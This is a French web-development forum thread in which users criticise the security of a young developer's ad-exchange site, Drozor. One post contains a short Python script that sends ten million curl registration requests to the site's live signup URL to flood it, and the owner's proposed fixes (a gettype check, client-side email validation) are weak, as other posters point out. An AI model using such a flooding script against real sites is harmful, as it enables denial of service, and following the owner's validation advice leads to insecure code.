Partage
  • Partager sur Facebook
  • Partager sur Twitter

[Régie Publicitaire] Drozor

Reprise du projet YouAds

30 juillet 2015 à 18:55:34

J'ai pas lu tous les commentaires (merci à ceux qui commentent pour rien dire ou pour se moquer de son projet)

J'étais pas très emballé au départ mais je me suis souvenu qu'à l'époque je faisais des forums sur un fournisseur gratuit et on s'inscrivait sur d'autres forums du même thème pour s'échanger des bannières en 88x31 qu'on affichait chacun sur nos forums respectifs.

J'espère que ton projet fonctionnera bien, en tout cas, pour ceux qui n'ont pas d'argent pour se référencer, ceux qui démarrent leur site web ton projet peut devenir intéressant. Quand j'aurai fini mon site je m'inscrirai sur Drozor le temps d'avoir un minimum de visiteurs par mois.

  • Partager sur Facebook
  • Partager sur Twitter
Blog personnel → XLukkY's Blog   •   Projet web → Serialtek, journal web social
Anonyme
30 juillet 2015 à 19:11:26

Pour revenir à mon message, mon but n'était pas de créer la discorde. Je voulais simplement attirer l'attention sur le fait que si tu ne vérifies pas l'adresse e-mail ou qu'un mot de passe peu recherché soit pris en compte, ce n'est pas très professionnel et sécurisant, et par conséquent peu rassurant pour un utilisateur.

-
Edité par Anonyme 30 juillet 2015 à 19:12:25

  • Partager sur Facebook
  • Partager sur Twitter
Anonyme
30 juillet 2015 à 21:36:09

J'ai déjà dit plein de trucs utiles, soit que t'es pas assez intelligent pour comprendre, soit que t'es tellement de mauvaise foi que tu veux pas de l'admettre. Ou un peu des deux, c'est possible aussi x)

Remarque, c'est pas la première fois que c'est évoqué ton caractère :

> - Aze n'est pas ambitieux, il est ignorant et borné. Et totalement irrespectueux dans sa manière de ne rien écouter de ce qu'on lui dit.

Dominus Carnufex.

-
Edité par Anonyme 30 juillet 2015 à 21:38:55

  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 8:42:37

Drgalino : peut être que tu a déjà dit des trucs utiles au projet. Mais en tout cas tes derniers messages c'est vraiment pas ça. Soit tu poste des trucs vraiment utiles, soit tu clic sur le bouton "Arrêtez de suivre ce sujet". 

EDIT : Dominus Carnufex a le mérite d'avoir compris lui ;)

-
Edité par Aze_Studio 31 juillet 2015 à 8:51:55

  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
Anonyme
31 juillet 2015 à 9:46:39

A l'heure actuelle il est possible de totalement pourrir ton serveur en quelques lignes de code... 

#!/usr/bin/python3

import subprocess

url = "https://drozor.com/inscript.php"

for i in range(0, 10000000):
	x = str(i)
	data = "pseudo=" + x + "&mail=" + x + "&mdp=" + x + "&verif=" + x
	subprocess.call(["curl", "--data", data, url], stdout=subprocess.DEVNULL)

Les avertissements des membres sur la sécurité ne sont pas là pour t'emmerder Aze.

-
Edité par Anonyme 31 juillet 2015 à 10:07:13

  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 9:53:02

Et le mot de passe, il faut qu'il corresponde à la 2e verification, ou ca aussi c'est optionnel, et si on rentre 2 password différents ca passe ?

Tu te rends compte que c'est n'importe quoi, et qu'en plus tu refuses d'ecouter les avis des autres, avec la fameuse technique des enfants de 12 ans "LALALA j'ecoute pas !"

  • Partager sur Facebook
  • Partager sur Twitter
Anonyme
31 juillet 2015 à 10:08:44

Il y a 2 messages de cela je t'ai dit que la vidéo était moche. Et surtout ce "schéma". Que sur une régie publicitaire, c'est inadmissible, vous êtes dans le secteur de la communication, votre site doit être convaincant. Là ça montre juste une certaine incompétence.

C'était direct mais ça sous entendait "puisque c'est moche, faut faire quelque chose pour que ça devienne meilleur".

Visiblement puisque j'ai employé le mot "moche" tu as pris ça pour de l'inutile, mais j'ai juste plus le courage d'expliquer ça sur 10 lignes comme je l'aurai fait avant.

  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 11:03:16

@Str4nger : a ben voilà un vrai truc utile :) !

je vais voir comment je peux empêcher ça :) !

@Globorg : t'a essayé de rentrer deux mot de passes différents ?

@Drgalino : tu a dit que la vidéo étaient moche. J'avais bien compris le sens "puisque c'est moche, faut faire quelque chose pour que ça devienne meilleur". J'ai déjà dit avant que je suis une brêle en animation, et je t'ai répondu après qu'il n'y avait que lui qui avait proposé. Je n'ai pas pris ça pour de l'inutile, je t'ai répondu^^

  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
Anonyme
31 juillet 2015 à 11:10:19

Aze_Studio a écrit:

@Str4nger : a ben voilà un vrai truc utile :) !

Je ne fais que montrer comment exploiter la faille remontée hier par Rednax. Le mec dont tu t'es moqué parce qu'il te conseillait de vérifier les emails.
  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 11:24:15

non Str4nger ;)

car la vérification du format email, je la ferais en javascript sur la page inscription.php, au vue de ce qu'il me demande. (bien que ce soit passable^^).

Et pour bloquer ton script il m'a suffit de faire un gettype sur le POST ;)

-
Edité par Aze_Studio 31 juillet 2015 à 11:24:42

  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
31 juillet 2015 à 11:36:54

Aze_Studio a écrit:

non Str4nger ;)

car la vérification du format email, je la ferais en javascript sur la page inscription.php, au vue de ce qu'il me demande. (bien que ce soit passable^^).


Première leçon du développement d'applications web : ne jamais faire confiance aux données arrivant sur le serveur.

Mais c'est good, fais ton traitement en javascript, c'est une très bonne initiative :)

  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 11:39:47

tu a lu la parenthèse ?
  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
31 juillet 2015 à 11:40:51

Aze_Studio a écrit:

tu a lu la parenthèse ?


Oui, mais ce n'est pas "passable", c'est "profondément stupide", c'est tout.
  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 11:46:52

Aze_Studio a écrit:

Et pour bloquer ton script il m'a suffit de faire un gettype sur le POST ;)


Tu peux être plus précis stp, comment bloques-tu avec GetType? J'ai regardé la fonction je ne vois pas comment tu procèdes.
  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 11:49:28

Si tu attend que quelqu'un te ponde un code qui peut pourrir ton serveur pour corriger des erreurs, tu va avoir des problèmes.

Si j'ai bien compris en plus y'a des histoires de rémunération derrière, c'est d'autant plus dangereux. Prie pour que ton site ne devienne pas assez connue pour que les pirates s'y intéresse un peu.

Sinon, pourquoi pas une version en anglais? Le peu de mots affichés sont facilement traduisible je pense ;)

Par curiosité, quel type de BD utilise tu?

-
Edité par R_T_F_M 31 juillet 2015 à 11:49:43

  • Partager sur Facebook
  • Partager sur Twitter
Je fais des erreurs, j'ai pas la science infuse. Mais généralement, j'ai lu le putain de manuel
Anonyme
31 juillet 2015 à 11:59:21

Aze_Studio a écrit:

Et pour bloquer ton script il m'a suffit de faire un gettype sur le POST ;)

Je pense que tu as mal compris l'intention de ce script - c'est 7 lignes de code et encore moins de minutes de travail, je n'ai évidemment pas cherché à le rendre intelligent ni même à le lancer.

Quelqu'un qui s'y met vraiment peut mettre ton site hors ligne en quelques heures et tu as l'air de ne pas en prendre conscience. 

-
Edité par Anonyme 31 juillet 2015 à 11:59:41

  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 12:04:07

@OmgImBad : 

if (gettype($pseudo) == "string") {

...} 


vu que toute les variables sont de type string normalement, ça bloque le script au début si c'est pas le cas ;) (ça limite donc fortement la charge serveur)

@R_T_F_M :

y'a aucune rémunération derrière ;)

la traduction c'est sur la To-Do list, mais c'est un peu bas dedans pour le moment ;).

j'utilise MySQL.

-
Edité par Aze_Studio 31 juillet 2015 à 12:04:58

  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
31 juillet 2015 à 12:07:22

Il suffit à Stranger d'utiliser une chaine de caractères aléatoire dans son script et ton gettype ne résout plus rien du tout :/
  • Partager sur Facebook
  • Partager sur Twitter

Développeur passionné, amoureux des maths et créateur de Poker Toolkit, un logiciel pour définir ses ranges au poker.

Anonyme
31 juillet 2015 à 12:08:38

... Ce qui se fait en ajoutant quatre caractères.
  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 12:13:52

Yep ^^

C'est pour ça que y'a des protections anti-DDOS sur le serveur^^

  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
31 juillet 2015 à 12:19:55

Mais tu as toujours réponse à tout dit moi !

C'est super de voir des gens de 14 ans apprendre leur métier à des gens dans la vie active qui te donnent des conseils (pertinents) gratuitement ! 

  • Partager sur Facebook
  • Partager sur Twitter

Mon projet: SpotRoom. N'hésites pas à passer dire ce que tu en penses !

Anonyme
31 juillet 2015 à 12:24:49

Et si je donne le process pour récupérer ton username FTP, c'est toujours cool ? Parce que ça prend 10s.

  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 12:25:49

@Str4nger : ben je veux bien que tu me le donne par MP^^
  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
Anonyme
31 juillet 2015 à 12:29:38

Tu veux les champs de tes bases de données avec ça ou bien ça ira ?

  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 12:31:02

ça ira^^
  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
Anonyme
31 juillet 2015 à 13:28:48

Par contre j'ai un problème technique, mon compte "Stranger" a été supprimé :/
  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 13:57:35

refait en un^^
  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
Anonyme
31 juillet 2015 à 14:08:06

"Mail déjà utilisé".

this_is_unique_email@test.com est déjà utilisé ?

  • Partager sur Facebook
  • Partager sur Twitter
31 juillet 2015 à 14:33:46

j'ai ajouté un filtre IP pour l'inscription, et j'ai oublié de changer le nom d'une variable...

Du coup ça devrait être bon^^

(GG a toi si tu a le domaine test.com :D)

  • Partager sur Facebook
  • Partager sur Twitter
(ಠ_ಠ)  va voir Drozor
Anonyme
31 juillet 2015 à 14:36:31

Non, ça ne marche pas (je n'ai juste plus de message dans la boîte d'erreur).

Donc si je comprends bien :

  • tu as supprimé mon compte ;
  • tu développe directement en production ;
  • tu ne teste même pas l'inscription.

Comment veux-tu être pris au sérieux ?

  • Partager sur Facebook
  • Partager sur Twitter